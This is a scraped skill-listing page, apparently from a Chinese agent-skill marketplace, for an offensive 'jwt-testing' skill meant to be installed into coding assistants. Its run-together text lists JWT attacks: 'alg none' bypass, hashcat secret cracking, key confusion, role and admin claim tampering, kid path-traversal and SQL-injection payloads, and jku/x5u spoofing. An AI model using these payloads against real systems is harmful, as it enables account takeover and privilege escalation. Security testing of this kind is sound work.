一键导入
jwt-testing
JWT token attack techniques — alg bypass, key confusion, claim tampering
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
菜单
JWT token attack techniques — alg bypass, key confusion, claim tampering
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
| name | jwt-testing |
| description | JWT token attack techniques — alg bypass, key confusion, claim tampering |
| origin | RedteamOpencode |
xxxxx.yyyyy.zzzzz (three base64url segments)-m 16500 for JWT cracking)alg, typ, kid, jku, jwksub, role, admin, exp, iat, iss"alg": "none" — remove signature"alg": "None", "alg": "NONE", "alg": "nOnE"header.payload.alg: HS256, brute-force secret:
hashcat -m 16500 jwt.txt rockyou.txtsecret, password, application name, blank stringpython3 jwt_tool.py TOKEN -C -d wordlist.txt/.well-known/jwks.json)alg from RS256 to HS256sub to another user IDrole from user to adminadmin: true or is_admin: 1exp far into the futureiss to see if validatedkid injection: "kid": "../../dev/null" (empty key → trivial signature)kid SQL injection: "kid": "key' UNION SELECT 'secret'--"jku spoofing: point to attacker-controlled JWKSjwk embedding: include attacker's key in headerx5u / x5c: point to attacker certificateaud) claim validationBusiness logic vulnerability detection — workflow bypass, price manipulation, state abuse, and application-specific flaws
Detect PII, credentials, and corporate sensitive data in API responses, source code, files, headers, and database extracts
Detect and exploit SQL injection vulnerabilities in web application parameters
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Detect and exploit cross-site scripting vulnerabilities in web applications
Discover hidden parameters, test values, and identify input handling anomalies